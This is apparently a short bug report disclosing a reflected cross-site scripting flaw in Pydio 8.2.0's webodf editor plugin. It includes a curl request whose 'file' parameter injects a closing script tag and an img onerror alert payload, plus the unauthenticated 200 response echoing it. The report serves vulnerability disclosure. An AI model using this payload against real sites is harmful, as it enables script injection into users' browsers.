bug in validate/sanitize requests in webodf

[mbadici]

Accessing:

curl -v "https://mypydio/plugins/editor.webodf/frame.php?file=1e8ali%3C/script%3E%3Cimg/src=%27x%27/onerror=alert(document.location)%3E" output:

User-Agent: curl/7.49.1 Accept: /

< HTTP/1.1 200 OK < Date: Thu, 12 Jul 2018 15:04:55 GMT < Server: Apache < X-Frame-Options: SAMEORIGIN < Strict-Transport-Security: max-age=15768000; includeSubdomains; < Vary: Accept-Encoding < Content-Length: 965 < Content-Type: text/html; charset=UTF-8 <

"); //window.odfcanvas.setEditable(true); /* odfcanvas.odfContainer().save(function(err){ console.log(err); }); */ } window.setTimeout(init, 0);

Since the access isn't authenticated should output just a redirect to the login page. My version is 8.2.0